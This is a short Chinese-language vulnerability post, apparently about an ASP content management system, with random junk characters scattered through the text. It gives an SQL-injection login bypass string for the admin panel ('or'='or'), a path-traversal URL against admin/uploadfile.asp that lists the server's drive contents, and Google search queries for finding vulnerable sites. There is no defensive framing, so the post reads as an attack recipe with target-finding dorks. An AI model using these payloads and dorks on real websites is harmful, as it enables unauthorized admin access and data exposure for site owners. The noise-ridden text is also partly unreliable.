后台万能密码 'or'='or'
& ]# U( u, |+ v2 s# B+ V+ e8 O, r3 m" }9 _, \; |& K
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
( p: c/ W. h& [; m0 x4 c Wadmin/uploadfile.asp?currentFolder=/upfiles/../5 e% Z2 R' b1 f( D0 ]9 Y, n
" k2 {4 q) H$ t U$ C5 E3 k" S: Y漏洞证明:) @9 Y6 n6 D' S/ S( o+ Z n& P0 N% [% ~8 l
9 Q/ e, Q7 \& y& _% d# j% p谷歌:inurl:type.asp?id=1 新闻中心' C! t% K8 a3 |7 c% b8 X9 b
或者 :inurl:download_ok.asp?, \, _ g6 ]5 g* X4 @
2 i K) S# `# l& ^1 [" z; ~
|